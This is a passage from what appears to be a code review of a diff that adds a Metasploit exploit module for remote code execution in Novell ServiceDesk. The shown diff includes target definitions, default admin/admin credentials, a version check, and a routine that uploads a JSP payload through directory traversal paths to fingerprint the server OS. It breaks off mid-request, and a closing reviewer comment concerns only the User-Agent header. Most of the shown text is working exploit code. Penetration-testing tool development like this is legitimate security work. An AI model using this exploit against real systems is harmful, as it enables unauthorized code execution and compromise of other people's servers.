modules/exploits/multi/http/novell_servicedesk_rce.rb

```diff
@@ -0,0 +1,384 @@
+          [ 'URL', 'FULLDISC' ]
+        ],
+      'Platform'    => %w{ linux win },
+      'Arch'           => ARCH_X86,
+      'DefaultOptions' => { 'WfsDelay' => 15 },
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'Novell ServiceDesk / Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Novell ServiceDesk / Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86
+            }
+          ],
+        ],
+      'Privileged'     => false,  # Privileged on Windows but not on (most) Linux targets
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 30 2016'
+    ))
+
+    register_options(
+      [
+        OptPort.new('RPORT',
+          [true, 'The target port', 80]),
+        OptString.new('USERNAME',
+          [true, 'The username to login as', 'admin']),
+        OptString.new('PASSWORD',
+          [true, 'Password for the specified username', 'admin']),
+        OptString.new('TRAVERSAL_PATH',
+          [false, 'Traversal path to tomcat/webapps/LiveTime/'])
+      ], self.class)
+  end
+
+
+  def get_version
+    res = send_request_cgi({
+      'uri'    => normalize_uri('LiveTime','WebObjects','LiveTime.woa'),
+      'method' => 'GET',
+      'headers' => {
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+      }
+    })
+
+    if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/
+      return $1.to_f
+    else
+      return 999
+    end
+  end
+
+
+  def check
+    version = get_version
+    if version <= 7.1 && version >= 6.5
+      return Exploit::CheckCode::Appears
+    elsif version > 7.1
+      return Exploit::CheckCode::Safe
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+
+  def pick_target
+    return target if target.name != 'Automatic'
+
+    print_status("#{peer} - Determining target")
+
+    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+
+    traversal_paths = []
+    if datastore['TRAVERSAL_PATH']
+      traversal_paths << datastore['TRAVERSAL_PATH']    # add user specified or default Virtual Appliance path
+    end
+
+    # add Virtual Appliance path plus the traversal in a Windows or Linux self install
+    traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/'])
+
+    # test each path to determine OS (and correct path)
+    traversal_paths.each do |traversal_path|
+      jsp_name = upload_jsp(traversal_path, os_finder_payload)
+
+      res = send_request_cgi({
+        'uri'    => normalize_uri('LiveTime', jsp_name),
+        'method' => 'GET',
+        'headers' => {
+          'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+        },
```

Comment:
The user agent header should be removed. The send_request_cgi will select an appropriate UA automatically.